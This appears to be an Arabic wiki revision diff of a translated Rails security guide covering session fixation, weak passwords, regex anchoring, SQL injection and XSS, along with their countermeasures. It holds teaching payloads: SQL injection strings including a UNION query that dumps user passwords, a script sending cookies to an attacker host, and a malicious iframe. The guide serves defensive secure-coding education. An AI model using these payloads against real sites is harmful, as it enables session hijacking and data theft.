الفرق بين المراجعتين ل"Rails/security"

من موسوعة حسوب
اذهب إلى التنقل اذهب إلى البحث
سطر 121: سطر 121:
 
* يُنشئ المهاجم معرف جلسة صالح: يُحمِّل صفحة تسجيل الدخول الخاصة بتطبيق الويب حيث يريد إصلاح جلسة العمل، ثم يأخذ معرف جلسة العمل الموجود في ملف تعريف الارتباط من الاستجابة (راجع الرقمين 1 و 2 في الصورة).
 
* يُنشئ المهاجم معرف جلسة صالح: يُحمِّل صفحة تسجيل الدخول الخاصة بتطبيق الويب حيث يريد إصلاح جلسة العمل، ثم يأخذ معرف جلسة العمل الموجود في ملف تعريف الارتباط من الاستجابة (راجع الرقمين 1 و 2 في الصورة).
 
* يحتفظ المهاجم بالجلسة عن طريق الوصول إلى تطبيق الويب بشكل دوري من أجل منع انتهاء صلاحية الجلسة وإبقائها على قيد الحياة.
 
* يحتفظ المهاجم بالجلسة عن طريق الوصول إلى تطبيق الويب بشكل دوري من أجل منع انتهاء صلاحية الجلسة وإبقائها على قيد الحياة.
* يفرض المهاجم على متصفح المستخدم استخدام معرف جلسة العمل هذا (راجع رقم 3 في الصورة). نظرًا لأنه لا يجوز لك تغيير ملف تعريف ارتباط لنطاق آخر (بسبب نفس سياسة الأصل)، يجب على المهاجم تشغيل JavaScript من مجال تطبيق الويب المستهدف. ينفَّذ هذا الهجوم عبر حقن شيفرة JavaScript في التطبيق بواسطة XSS. إليك مثال على ذلك:
+
* يفرض المهاجم على متصفح المستخدم استخدام معرف جلسة العمل هذا (راجع رقم 3 في الصورة). نظرًا لأنه لا يجوز لك تغيير ملف تعريف ارتباط لنطاق آخر (بسبب سياسة المصدر الواحد [same origin policy])، يجب على المهاجم تشغيل JavaScript من مجال تطبيق الويب المستهدف. ينفَّذ هذا الهجوم عبر حقن شيفرة JavaScript في التطبيق بواسطة XSS. إليك مثال على ذلك:
 
<syntaxhighlight lang="html">
 
<syntaxhighlight lang="html">
 
<script>document.cookie="_session_id=16d5b78abb28e3d6206b60f22a03c8d9";</script>
 
<script>document.cookie="_session_id=16d5b78abb28e3d6206b60f22a03c8d9";</script>
سطر 303: سطر 303:
 
* من المهم جدًا التفكير في أسوأ الحالات: ماذا لو كان شخص ما قد احتفظ بملفات تعريف الارتباط أو بيانات اعتماد المستخدم. يمكنك تقديم أدوار للواجهة الإدارية للحد من إمكانيات المهاجم. وماذا عن بيانات اعتماد تسجيل الدخول الخاصة لواجهة الإدارة، بخلاف تلك المستخدمة للجزء العام من التطبيق. أو كلمة مرور خاصة لاتخاذ إجراءات خطيرة للغاية؟
 
* من المهم جدًا التفكير في أسوأ الحالات: ماذا لو كان شخص ما قد احتفظ بملفات تعريف الارتباط أو بيانات اعتماد المستخدم. يمكنك تقديم أدوار للواجهة الإدارية للحد من إمكانيات المهاجم. وماذا عن بيانات اعتماد تسجيل الدخول الخاصة لواجهة الإدارة، بخلاف تلك المستخدمة للجزء العام من التطبيق. أو كلمة مرور خاصة لاتخاذ إجراءات خطيرة للغاية؟
 
* هل يجب على المشرف حقًا الوصول إلى الواجهة من كل مكان في العالم؟ نفكر في الحد من تسجيل الدخول إلى مجموعة من عناوين IP المصدر. افحص request.remote_ip لمعرفة عنوان IP للمستخدم. هذه ليست واقية من الرصاص، ولكن تعد حاجزًا كبيرًا يقي من جهمات عديدة. تذكر أنه قد يكون هناك وسيط (proxy) قيد الاستخدام.
 
* هل يجب على المشرف حقًا الوصول إلى الواجهة من كل مكان في العالم؟ نفكر في الحد من تسجيل الدخول إلى مجموعة من عناوين IP المصدر. افحص request.remote_ip لمعرفة عنوان IP للمستخدم. هذه ليست واقية من الرصاص، ولكن تعد حاجزًا كبيرًا يقي من جهمات عديدة. تذكر أنه قد يكون هناك وسيط (proxy) قيد الاستخدام.
* ضع واجهة الإدارة على نطاق فرعي خاص مثل admin.application.com واجعله تطبيقًا منفصلًا مع إدارة المستخدم الخاصة به. هذا يجعل سرقة ملف تعريف ارتباط المستخدم المسؤول من النطاق المعتاد، www.application.com، مستحيلًا. هذا بسبب نفس سياسة الأصل في المتصفح الخاص بك: قد لا تقرأ الشيفرة البرمجية التي حُقنَت (XSS) على www.application.com ملف تعريف الارتباط لـ admin.application.com والعكس بالعكس.
+
* ضع واجهة الإدارة على نطاق فرعي خاص مثل admin.application.com واجعله تطبيقًا منفصلًا مع إدارة المستخدم الخاصة به. هذا يجعل سرقة ملف تعريف ارتباط المستخدم المسؤول من النطاق المعتاد، www.application.com، مستحيلًا. هذا بسبب سياسة المصدر الواحد (same origin policy) في المتصفح الخاص بك: قد لا تقرأ الشيفرة البرمجية التي حُقنَت (XSS) على www.application.com ملف تعريف الارتباط لـ admin.application.com والعكس بالعكس.
  
 
== إدارة المستخدم ==
 
== إدارة المستخدم ==
سطر 373: سطر 373:
  
 
=== كلمات المرور الجيدة ===
 
=== كلمات المرور الجيدة ===
ملاحظة: هل تجد صعوبة في تذكر كل كلمات المرور الخاصة بك؟ لا تدونها، ولكن استخدم الحروف الأولية لكل كلمة في جملة سهلة التذكر.
+
'''ملاحظة''': هل تجد صعوبة في تذكر كل كلمات المرور الخاصة بك؟ لا تدونها، ولكن استخدم الحروف الأولية لكل كلمة في جملة سهلة التذكر.
  
قام بروس شناير، وهو تقني أمني، بتحليل 34000 اسم مستخدم وكلمة مرور في العالم الحقيقي من هجوم MySpace للتصيد الاحتيالي المذكور أدناه. اتضح أن معظم كلمات المرور من السهل جدًا اختراقها. كلمات المرور العشرين الأكثر شيوعًا هي:
+
قام بروس شناير (Bruce Schneier)، وهو تقني أمني، [http://www.schneier.com/blog/archives/2006/12/realworld_passw.html بتحليل] 34000 اسم مستخدم وكلمة مرور حقيقين من هجوم MySpace للتصيد الاحتيالي المذكور أدناه. اتضح أن معظم كلمات المرور من السهل جدًا اختراقها. كلمات المرور العشرين الأكثر شيوعًا هي:<syntaxhighlight lang="text">
 +
password1
 +
abc123
 +
myspace1
 +
password
 +
blink182
 +
qwerty1
 +
****you
 +
123abc
 +
baseball1
 +
football1
 +
123456
 +
soccer
 +
monkey1
 +
liverpool1
 +
princess1
 +
jordan23
 +
slipknot1
 +
superman1
 +
iloveyou1
 +
monkey
  
password1, abc123, myspace1, password, blink182, qwerty1, ****you, 123abc, baseball1, football1, 123456, soccer, monkey1, liverpool1, princess1, jordan23, slipknot1, superman1, iloveyou1, and monkey.
 
  
من المثير للاهتمام أن 4٪ فقط من كلمات المرور هذه كانت كلمات معجم وأن الأغلبية العظمى هي أبجدية رقمية. ومع ذلك، تحتوي يستخدم روبي نهجًا مختلفًا بعض الشيء عن العديد من اللغات الأخرى لتتطابق مع نهاية وبداية السلسلة. هذا هو السبب في أن العديد من كتب روبي ورييلز يخطئون. إذن كيف يكون هذا تهديدًا أمنيًا؟ لنفترض أنك تريد التحقق من صحة حقل عنوان URL بشكل غير صحيح وأنك استخدمت تعبيرًا عاديًا بسيطًا كالتالي:قواميس تكرارات كلمة المرور على عدد كبير من كلمات المرور اليوم، وتجربة جميع أنواع تركيبات (أبجدية). إذا كان المهاجم يعرف اسم المستخدم الخاص بك وكنت تستخدم كلمة مرور ضعيفة، سيخترق حسابك بسهولة.
+
</syntaxhighlight>من المثير للاهتمام أن 4٪ فقط من كلمات المرور هذه كانت كلمات معجم وأن الأغلبية العظمى هي حروف أبجدية ورقمية. ومع ذلك، تحتوي قواميس مخترقي كلمة المرور على عدد كبير من كلمات المرور المستخدمة في يومنا هذا، إذ يجربون جميع أنواع التركيبات (الأبجدية والرقمية). إذا كان المهاجم يعرف اسم المستخدم الخاص بك وكنت تستخدم كلمة مرور ضعيفة، فسيخترق حسابك بسهولة.
  
كلمة المرور الجيدة هي تركيبة أبجدية رقمية طويلة من الحالات المختلطة. بما أنه من الصعب تذكر ذلك، فمن المستحسن أن ندخل فقط الأحرف الأولى من الجملة التي يمكنك تذكرها بسهولة. على سبيل المثال "The quick brown fox jumps over the lazy dog" سيكون "Tqbfjotld". لاحظ أن هذا مجرد مثال، يجب ألا تستخدم عبارات معروفة مثل هذه، كما قد تظهر في قواميس التكسير، أيضًا.
+
كلمة المرور الجيدة هي تركيبة أبجدية رقمية طويلة من الحالات المختلطة. بما أنه من الصعب تذكر ذلك، فمن المستحسن أن ندخل فقط الأحرف الأولى من جملة يمكنك تذكرها بسهولة. على سبيل المثال، كلمة مرور مستخلصة من الجملة "The quick brown fox jumps over the lazy dog" ستكون "Tqbfjotld". لاحظ أن هذا مجرد مثال، أي لا يجب أن تستخدم عبارات معروفة مثل هذه، إذ قد تظهر في قواميس المخترقين أيضًا.
  
=== التعبيرات العادية ===
+
=== التعابير النمطية ===
ملاحظة: من الوقائع الشائعة في تعبيرات Ruby العادية هي مطابقة بداية السلسلة ونهايتها بـ ^ و $ ، بدلاً من \ A و \ z.
+
'''ملاحظة''': من الوقائع الشائعة في [[Ruby/Regexp|تعابير روبي النمطية]] هي مطابقة بداية السلسلة ونهايتها عبر <code>^</code> و <code>$</code> ، بدلًا من \A و \z.
  
يستخدم روبي نهجًا مختلفًا بعض الشيء عن العديد من اللغات الأخرى لتتطابق مع نهاية وبداية السلسلة. هذا هو السبب في أن العديد من كتب Ruby و Rails يخطئون. إذن كيف يكون هذا تهديدًا أمنيًا؟ لنفترض أنك تريد التحقق من صحة حقل عنوان URL بشكل غير صحيح وأنك استخدمت تعبيرًا عاديًا بسيطًا كالتالي:
+
تستخدم روبي نهجًا مختلفًا بعض الشيء عن العديد من اللغات الأخرى لمطابقة نهاية وبداية سلسلة نصية. هذا هو السبب في أن العديد من الكتب التي تشرح روبي وريلز تخطئ بشرح هذه النقطة. إذن، كيف يكون هذا تهديدًا أمنيًا؟ لنفترض أنك تريد التحقق من صحة حقل عنوان URL بشكل غير صحيح وأنك استخدمت تعبيرًا نمطيًّا بسيطًا كالتالي:<syntaxhighlight lang="text">
 +
/^https?:\/\/[^
 +
</syntaxhighlight>هذا قد يعمل بشكل جيد في بعض اللغات. ومع ذلك، في روبي، يطابق المحرف <code>^</code> و <code>$</code> بداية السطر ونهاية السطر. وبالتالي، فإن عنوان URL مثل هذا يجري عملية الترشيح بدون مشاكل:<syntaxhighlight lang="javascript">
 +
javascript:exploit_code();/*
 +
http://hi.com
 +
*/
 +
</syntaxhighlight>يجتاز عنوان URL هذا المرشح لأن التعبير النمطي يطابق السطر الثاني، ولا يهم البقية. الآن تخيل أنه لدينا [[Rails/action view overview|وحدة عرض]] أظهرت عنوان URL مثل هذا:<syntaxhighlight lang="rails">
 +
link_to "Homepage", @user.homepage
 +
</syntaxhighlight>يبدو الارتباط بسيطًا للزائرين، ولكن عند النقر عليه، سينفذ الدالة "exploit_code" التي تخص [[JavaScript]] أو أي دالة [[JavaScript]] أخرى يوفرها المهاجم.
 +
 
 +
لإصلاح التعبير النمطي، يجب استخدام <code>‎\A</code> و <code>‎\z</code> بدلًا من <code>^</code> و <code>$</code>، مثل:<syntaxhighlight lang="text">
 +
/\Ahttps?:\/\/[^\n]+\z/i
 +
</syntaxhighlight>بما أن هذا خطأ متكرر، فإن مدقق الصياغة (validates_format_of) يطرح الآن استثناءً إذا كان التعبير النمطي المقدم يبدأ بـ <code>^</code> أو ينتهي بـ <code>$</code>. إذا كنت بحاجة إلى استخدام <code>^</code> و <code>$</code> بدلًا من <code>‎\A</code> و <code>‎\z</code> (وهو أمر نادر الحدوث)، فيمكنك ضبط الخيار <code>‎:multiline</code> إلى القيمة <code>true</code>، مثل:<syntaxhighlight lang="rails">
 +
# في أي مكان في السلسلة النصية "Meanwhile" سطرًا فيه content يجب أن يحوي
 +
validates :content, format: { with: /^Meanwhile$/, multiline: true }
 +
</syntaxhighlight>لاحظ أن هذا لا يحميك إلا من الخطأ الأكثر شيوعًا عند استخدام أداة التحقق من الصياغة، إذ عليك دائمًا أن تضع في اعتبارك أن <code>^</code> و <code>$</code> يتطابقان مع بداية السطر ونهايته في روبي، وليس بداية ونهاية السلسلة.
 +
 
 +
=== زيادة الصلاحيات ===
 +
'''تحذير''': قد يؤدي تغيير معامل واحد إلى منح المستخدم وصولًا غير مصرح به. تذكر أنه قد يتغير كل معامل، بغض النظر عن مدى إخفاءه أو تشويشه.
 +
 
 +
المعامل الأكثر شيوعًا التي قد يعبث به المستخدم هو معامل المعرّف <code>id</code>، كما هو الحال في <nowiki>http://www.domain.com/project/1،</nowiki> الذي يمثِّل الرقم 1 فيه المعرف. سيكون المعرف متاحًا في <code>params</code> في وحدة التحكم. هناك، على الأرجح ستفعل شيئًا كالتالي:<syntaxhighlight lang="rails">
 +
@project = Project.find(params[:id])
 +
</syntaxhighlight>هذا أمر لا بأس به بالنسبة لبعض تطبيقات الويب، ولكن بالتأكيد ليس إذا كان المستخدم غير مخول لعرض جميع المشاريع. إذا غيّر المستخدم المعرف إلى 42، ولا لم يكن يُسمح له برؤية تلك المعلومات، فسيكون بإمكانه الوصول إليها على أي حال. بدلًا من ذلك، استَعلِم عن حقوق وصول المستخدم أيضًا:<syntaxhighlight lang="rails">
 +
@project = @current_user.projects.find(params[:id])
 +
</syntaxhighlight>اعتمادًا على تطبيق الويب الخاص بك، سيكون هناك العديد من المعاملات التي يمكن للمستخدم التلاعب بها. كقاعدة عامة، تعد البيانات التي يدخلها المستخدم غير آمنة حتى يثبت العكس؛ ومن المحتمل أن يُتلاعَب بكل معامل أعطي من طرف المستخدم.
 +
 
 +
لا تنخدع بالأمن عن طريق التعتيم وأمن JavaScript. تتيح لك أدوات المطوّرين مراجعة الحقول المخفية لكل نموذج وتغييرها. يمكن استخدام JavaScript للتحقق من صحة بيانات إدخال المستخدم، ولكن بالتأكيد لا يمنع المهاجمين من إرسال طلبات ضارة ذات قيم غير متوقعة. تسجل الإضافة Firebug من Mozilla Firefox كل طلب وقد تكرره وتغيره. هذه طريقة سهلة لتجاوز أي عمليات التحقق من طرف JavaScript. وهناك أيضًا الوسيط من جانب العميل (client-side proxies) الذي يسمح لك باعتراض أي طلب واستجابة من وإلى الإنترنت.
 +
 
 +
== الحقن ==
 +
'''ملاحظة''': الحقن هو فئة من الهجمات التي تدخل رمز أو معاملات ضارة في تطبيق ويب من أجل تشغيله ضمن سياق الأمان الخاص به. الأمثلة البارزة للحقن هي البرمجة عبر المواقع (XSS) وحقن استعلامات SQL.
 +
 
 +
الحقن صعب للغاية، لأنه يمكن أن يكون تسلك نفس الشيفرة أو المعامل سلوكًا خبيثًا في سياق واحد، ولكنها تكون غير ضارة تمامًا في سياق آخر. يمكن أن يكون السياق عبارة عن لغة برمجة نصية أو استعلام أو لغة برمجة أو بيئة صدفة أو تابع روبي/ريلز. تغطي الأقسام التالية جميع السياقات المهمة التي قد تحدث فيها هجمات حقن. القسم الأول، يغطي حكمًا هيكليًا فيما يتعلق حقن.
 +
 
 +
=== القوائم البيضاء والقوائم السوداء ===
 +
'''ملاحظة''': عند تطهير شيء ما أو حمايته أو التحقق منه، يفضل اللجوء إلى القوائم البيضاء عوضًا عن القوائم السوداء.
 +
 
 +
يمكن أن تكون القائمة السوداء قائمة بعناوين البريد الإلكتروني السيئة أو الإجراءات غير العامة أو وسوم HTML غير الصحيحة. هذا يعارض القائمة البيضاء التي تسرد عناوين البريد الإلكتروني الجيدة، والإجراءات العامة، ووسوم HTML الجيدة وما إلى ذلك. على الرغم من أنه من غير الممكن في بعض الأحيان إنشاء قائمة بيضاء (في مرشح الرسائل غير المرغوب بها [SPAM filter] على سبيل المثال)، تفضل اعتماد منهج القائمة البيضاء:
 +
* استخدم <code>before_action</code> باستثناء: <code>[...]</code> بدلًا من: <code>[...]</code> للإجراءات المتعلقة بالأمان. بهذه الطريقة لا تنسَ أن تقوم بتمكين التحقق من الأمان للإجراءات المضافة حديثًا.
 +
* اسمح باستخدام <code><nowiki><strong></nowiki></code> بدلاً من إزالة <code><script></code> ضد هجمات XSS. انظر أدناه للحصول على التفاصيل.
 +
* لا تحاول تصحيح مدخلات المستخدم بواسطة القوائم السوداء:
 +
** ما يلي سيجعل الهجوم يعمل: <code>("","<sc<script>ript>".gsub("<script>"</code>
 +
** لكن ارفض الإدخال غير الصحيح.
 +
القوائم البيضاء هي أيضًا وسيلة جيدة ضد العامل البشري في نسيان شيء ما في القائمة السوداء.
 +
 
 +
=== حقن SQL ===
 +
'''ملاحظة''': بفضل التوابع الذكية، لا يعد ذلك مشكلة في معظم تطبيقات ريلز. ومع ذلك، هذا هجوم مدمر وشائع في تطبيقات الويب، لذلك من المهم فهم مسبباته.
 +
 
 +
==== المقدمة ====
 +
تهدف هجمات حقن SQL إلى التأثير على استعلامات قاعدة البيانات عن طريق معالجة معاملات تطبيق الويب. الهدف الشائع من هجمات حقن SQL هو تجاوز التفويض. هدف آخر هو تنفيذ معالجة البيانات أو قراءة البيانات التعسفية. في ما يلي مثال على كيفية عدم استخدام بيانات مدخلة من طرف المستخدم في استعلام:<syntaxhighlight lang="rails">
 +
Project.where("name = '#{params[:name]}'")
 +
</syntaxhighlight>قد يكون هذا في إجراء بحث ويمكن للمستخدم إدخال اسم مشروع يريد العثور عليه. إذا قام مستخدم ضار بإدخال <code>--OR 1'</code>، فإنَّ استعلام SQL الناتج سيكون:<syntaxhighlight lang="sql">
 +
SELECT * FROM projects WHERE name = '' OR 1 --'
 +
 
 +
</syntaxhighlight>تبدأ الشرطتان تعليقًا يتجاهل كل شيء بعده. لذا يرجع الاستعلام كافة السجلات من جدول المشاريع بما في ذلك المحجوبة للمستخدم. وذلك لأن الشرط صحيح لجميع السجلات.
 +
 
 +
==== تجاوز التخويل ====
 +
عادة ما يتضمن تطبيق الويب التحكم في الوصول. يُدخِل المستخدم بيانات اعتماد تسجيل الدخول الخاصة به ويحاول تطبيق الويب العثور على السجل المطابق في جدول المستخدمين. يمنح التطبيق الوصول عندما يجد سجلًا. ومع ذلك، قد يتجاوز المهاجم هذا التحقق باستخدام حقن تعليمة SQL. يعرض المثال التالي استعلامًا نموذجيًا لقاعدة البيانات في ريلز للعثور على السجل الأول في جدول المستخدمين الذي يطابق معاملات بيانات اعتماد تسجيل الدخول التي يوفرها المستخدم.<syntaxhighlight lang="rails">
 +
User.find_by("login = '#{params[:name]}' AND password = '#{params[:password]}'")
 +
</syntaxhighlight>إذا قام المهاجم بإدخال <code>'OR' 1 '=' 1</code> كاسم، و <code>'OR' 2 '>' 1</code> ككلمة مرور، فسيكون استعلام SQL الناتج:<syntaxhighlight lang="sql">
 +
SELECT * FROM users WHERE login = '' OR '1'='1' AND password = '' OR '2'>'1' LIMIT 1
 +
 
 +
</syntaxhighlight>سيجد هذا ببساطة السجل الأول في قاعدة البيانات، ويمنح الوصول إلى هذا المستخدم.
 +
 
 +
==== القراءة غير المصرح بها ====
 +
تربط التعليمة <code>UNION</code> استعملامين اثنين من استعلامات SQL وتعيد البيانات في مجموعة واحدة. يمكن للمهاجم استخدامها لقراءة البيانات التعسفية من قاعدة البيانات. لنأخذ المثال من الأعلى:<syntaxhighlight lang="rails">
 +
Project.where("name = '#{params[:name]}'")
 +
</syntaxhighlight>والآن دعونا نحقن استعلام آخر باستخدام التعليمة <code>UNION</code>:<syntaxhighlight lang="sql">
 +
') UNION SELECT id,login AS name,password AS description,1,1,1 FROM users --
 +
</syntaxhighlight>سيؤدي ذلك إلى استعلام SQL التالي:<syntaxhighlight lang="sql">
 +
SELECT * FROM projects WHERE (name = '') UNION
 +
  SELECT id,login AS name,password AS description,1,1,1 FROM users --'
 +
</syntaxhighlight>لن تكون النتيجة قائمة مشاريع (لأنه لا يوجد مشروع باسم فارغ)، ولكن قائمة بأسماء المستخدمين وكلمات المرور الخاصة بهم. نأمل أن تكون كلمات المرور مشفرة في قاعدة البيانات! المشكلة الوحيدة للمهاجم هي أن عدد الأعمدة يجب أن يكون هو نفسه في كلا الاستعلامات. هذا هو السبب في أن الاستعلام الثاني يتضمن قائمة من الواحدات (1)، والتي ستكون دائمًا القيمة 1، لمطابقة عدد الأعمدة في طلب البحث الأول.
 +
 
 +
أيضًا، يعيد الاستعلام الثاني تسمية بعض الأعمدة باستخدام التعليمة <code>AS</code> بحيث يعرض تطبيق الويب القيم من جدول المستخدم. تأكد من تحديث ريلز الخاصة بك إلى [http://www.rorsecurity.info/2008/09/08/sql-injection-issue-in-limit-and-offset-parameter/ الإصدار 2.1.1] على أقل تقدير.
 +
 
 +
==== التدابير المضادة ====
 +
يحتوي ريلز على مرشح مدمج لمحارف تعليمات SQL الخاصة الذي سيُهرِّب المحرف <code>'</code>، و <code>"</code>، و <code>NULL</code> وفواصل الأسطر. يطبق استخدام 
 +
 
 +
<code>(Model.find(id</code> أو <code>(Model.find_by_some thing(something</code> هذا الأمر تلقائيًا. ولكن في أجزاء تعليمات SQL، خاصة في أجزاء الشروط (<code>where("...")‎</code>) أو التابعين <code>()connection.execute</code> أو <code>()Model.find_by_sql</code>، يجب أن تطبق يدويًا.
 +
 
 +
بدلًا من تمرير سلسلة إلى خيار الشروط، يمكنك تمرير مصفوفة لتعقيم السلاسل الملوثة مثل:<syntaxhighlight lang="rails">
 +
Model.where("login = ? AND password = ?", entered_user_name, entered_password).first
 +
</syntaxhighlight>كما ترى، الجزء الأول من المصفوفة عبارة عن جزء من تعليمة SQL يحتوي على علامات استفهام. الإصدارات المعقمة للمتغيرات في الجزء الثاني من المصفوفة تحل محل علامات الاستفهام. أو يمكنك تمرير [[Ruby/Hash|جدول Hash]] لنفس النتيجة:<syntaxhighlight lang="rails">
 +
Model.where(login: entered_user_name, password: entered_password).first
 +
</syntaxhighlight>شكل [[Ruby/Array|المصفوفة]] أو [[Ruby/Hash|الجدول Hash]] متاح فقط في الحالات النموذجية. يمكنك تجريب <code>()sanitize_sql</code> في مكان آخر. اجعل التفكير في العواقب الأمنية عند استخدام سلسلة خارجية في SQL عادةً لك.
 +
 
 +
=== البرمجة عبر المواقع (XSS) ===
 +
'''ملاحظة''': هذا النوع من الهجمات هي الأكثر انتشارًا، وأحد أكثر نقاط الضعف الأمنية تدميرًا في تطبيقات الويب. هذا الهجوم الخبيث يضخ رمزًا تنفيذيًا من جانب العميل. يوفر ريلز توابع مساعدة لإيقاف هذه الهجمات.
 +
 
 +
==== نقاط الدخول ====
 +
منفذ شن المهاجم هجومه هو عنوان URL ضعيف ومعاملاته.
 +
 
 +
منافذ بدء شن الهجوم الأكثر شيوعًا هي منشورات الرسائل وتعليقات المستخدمين وكتب الزائرين، ولكن عناوين المشروعات وأسماء المستندات وصفحات نتائج البحث كانت أيضًا عرضة، إذ تعد الأماكن حيث يمكن للمستخدم إدخال البيانات فيها منافذ محتملة لشن الهجوم. ولكن لا يجب بالضرورة أن تأتي المدخلات من مربعات الإدخال على مواقع الويب، إذ فيمكن أن تكون في أي معامل URL - واضح أو مخفي أو داخلي. تذكر أن المستخدم قد يعترض أي حركة مرور للبيانات. تجعل التطبيقات أو وكلاء موقع العميل من السهل تغيير الطلبات. هناك أيضًا أماكن أخرى محتملة للهجوم مثل الإعلانات.
 +
 
 +
تعمل هجمات XSS بالشكل التالي: يحقن أحد المهاجمين بعض الرموز، ويحفظه تطبيق الويب ويعرضه على صفحة، يُقدم لاحقًا إلى أحد الضحايا. تعرض معظم أمثلة XSS ببساطة مربع تنبيه، لكنها أقوى من ذلك. يمكن لهجمات XSS سرقة ملف تعريف الارتباط، أو خطف الجلسة، أو إعادة توجيه الضحية إلى موقع ويب مزيف، أو عرض إعلانات لصالح المهاجم، أو تغيير العناصر على موقع الويب للحصول على معلومات سرية أو تثبيت برامج ضارة من خلال ثغرات أمنية في متصفح الويب.
 +
 
 +
خلال النصف الثاني من عام 2007، سجلت 88 نقطة ضعف في متصفحات موزيلا، و 22 نقطة في سفاري، و 18 نقطة في IE، و 12 نقطة في أوبرا. كما وثق [http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_internet_security_threat_report_xiii_04-2008.en-us.pdf تقرير التهديدات العالمية لأمن الإنترنت من سيمانتك] 239 نقطة ضعف في إضافات المتصفحات في الأشهر الستة الأخيرة من عام 2007. ويعد [http://pandalabs.pandasecurity.com/mpack-uncovered/ Mpack] إطارًا نشطًا وحديثًا للهجوم يستغل هذه الثغرات الأمنية. بالنسبة للمتسللين الإجراميين، فإنه من الأمور الجذابة للغاية استغلال ثغرة حقن SQL في إطار تطبيق ويب وإدراج شفرة خبيثة في كل عمود جدول نصي. في أبريل / نيسان 2008، اختُرِق أكثر من 510،000 موقع بهذا الشكل، من بينها موقع الحكومة البريطانية والأمم المتحدة والعديد من المواقع البارزة.
 +
 
 +
==== حقن شيفرة HTML/JavaScript ====
 +
تعد اللغة الأكثر شيوعًا في هجمات XSS هي لغة JavaScript الشائعة الاستخدام في البرمجة من طرف العميل، غالبًا مع HTML. لذلك، يعد تهريب مدخلات المستخدم أمرًا ضروريًّا.
 +
 
 +
إليك أبسطة اختبار للتحقق من هجمات XSS:<syntaxhighlight lang="html">
 +
<script>alert('Hello');</script>
 +
</syntaxhighlight>ستعرض شيفرة JavaScript هذه ببساطة مربع تنبيه. الأمثلة التالية تفعل الشيء نفسه تمامًا، فقط في أماكن غير شائعة جدًا:<syntaxhighlight lang="html">
 +
<img src=javascript:alert('Hello')>
 +
<table background="javascript:alert('Hello')">
 +
</syntaxhighlight>
 +
 
 +
===== سرقة ملفات تعريف الارتباط =====
 +
هذه الأمثلة لا تسبب أي ضرر حتى الآن، لذلك دعنا نرى كيف يمكن للمهاجم سرقة ملف تعريف الارتباط الخاص بالمستخدم (وبالتالي اختطاف جلسة المستخدم). في [[JavaScript]]، يمكنك استخدام الخاصية <code>document.cookie</code> لقراءة ملف تعريف ارتباط الصفحة والكتابة عليه. يفرض [[JavaScript]] تطبيق سياسة المصدر الواحد (same origin policy)، مما يعني أن برنامجًا نصيًّا من أحد النطاقات لا يمكنه الوصول إلى ملفات تعريف ارتباط نطاق آخر. تحمل الخاصية <code>document.cookie</code> ملف تعريف ارتباط خادم الويب الأصلي. ومع ذلك، يمكنك قراءة هذه الخاصية والكتابة عليها إذا ضمّنت الشيفرة مباشرة في صفحة HTML (كما يحدث مع XSS). احقن الشيفرة التالية في أي مكان في تطبيق الويب الخاص بك لرؤية ملف تعريف الارتباط الخاص بك في صفحة النتائج:<syntaxhighlight lang="html">
 +
<script>document.write(document.cookie);</script>
 +
</syntaxhighlight>بالنسبة للمهاجم، بالطبع، هذا ليس مفيدًا، حيث سيرى الضحية ملف تعريف الارتباط الخاص به. سيحاول المثال التالي تحميل صورة من العنوان <nowiki>http://www.attacker.com/‎</nowiki> بالإضافة إلى ملف تعريف الارتباط. بالطبع هذا العنوان غير موجود، لذلك لا يعرض المتصفح أي شيء. ولكن يمكن للمهاجم مراجعة ملفات الدخول إلى خادم الويب الخاص به لرؤية ملف تعريف الارتباط الخاص بالضحية.<syntaxhighlight lang="html">
 +
<script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>
 +
 
 +
</syntaxhighlight>ستقرأ ملفات السجل على www.attacker.com على النحو التالي:<syntaxhighlight lang="http">
 +
GET http://www.attacker.com/_app_session=836c1c25278e5b321d6bea4f19cb57e2
 +
</syntaxhighlight>يمكنك تخفيف هذه الهجمات (بطريقة واضحة) بإضافة الراية <code>httpOnly</code> إلى ملفات تعريف الارتباط، بحيث لا يمكن قراءة <code>document.cookie</code> بواسطة [[JavaScript]]. يمكن استخدام ملفات تعريف الارتباط التي تخص HTTP فقط بدءًا من IE v6.SP1 و Firefox v2.0.0.5 و Opera 9.5 و Safari 4 و Chrome 1.0.154. إلا أن المتصفحات القديمة الأخرى (مثل WebTV و IE 5.5 على Mac) يمكن أن تتسبب في فشل تحميل الصفحة. كن حذرًا من أن ملفات تعريف الارتباط [https://www.owasp.org/index.php/HTTPOnly#Browsers_Supporting_HttpOnly ستظل مرئية باستخدام Ajax] مع ذلك.
 +
 
 +
===== التشويه =====
 +
مع تشويه صفحة الويب، يمكن للمهاجم القيام بالكثير من الأشياء مثل تقديم معلومات خاطئة أو إغراء الضحية  لدخول موقع المهاجم على الإنترنت لسرقة ملف تعريف الارتباط أو بيانات اعتماد تسجيل الدخول أو بيانات حساسة أخرى. الطريقة الأكثر شيوعًا هي تضمين شيفرة من مصادر خارجية بواسطة إطارات iframe:<syntaxhighlight lang="html">
 +
<iframe name="StatPage" src="http://58.xx.xxx.xxx" width=5 height=5 style="display:none"></iframe>
 +
</syntaxhighlight>يؤدي هذا إلى تحميل شيفرة HTML و / أو JavaScript عشوائيًا من مصدر خارجي وتضمينها كجزء من الموقع. أخذت الشيفرة السابقة للإطار iframe من هجوم فعلي نُفِّذ على مواقع إيطالية شرعية باستخدام [http://isc.sans.org/diary.html?storyid=3015 إطار الهجوم Mpack]. يحاول الإطار Mpack تثبيت برامج ضارة من خلال ثغرات أمنية في متصفح الويب، إذ نسبة نجاح هذا الهجوم كبيرة تصل إلى 50٪ من الهجمات.
 +
 
 +
يمكن أن يتداخل الهجوم أكثر تخصصًا مع موقع الويب بالكامل أو يعرض نموذج تسجيل الدخول، الذي يشبه نموذج الموقع الأصلي، ولكنه ينقل اسم المستخدم وكلمة المرور إلى موقع المهاجم. أو يمكنه استخدام CSS و / أو JavaScript لإخفاء رابط مشروع في تطبيق الويب، وعرض رابط آخر في مكانه يعيد التوجيه إلى موقع ويب مزيف.
 +
 
 +
هجمات الحقن المنعكس هي تلك التي لا تخزن الحمولة فيها لعرضها على الضحية في وقت لاحق، و لكنها مدرجة في عنوان URL. نماذج البحث الخاصة تفشل في الهروب من سلسلة البحث. قدم الرابط التالي صفحة ذكرت أن "جورج بوش عين صبيًا في التاسعة من عمره ليكون رئيسًا ...":
 +
 
 +
<nowiki>http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1--</nowiki>>
  
/^https?:\/\/[^\n]+$/i
+
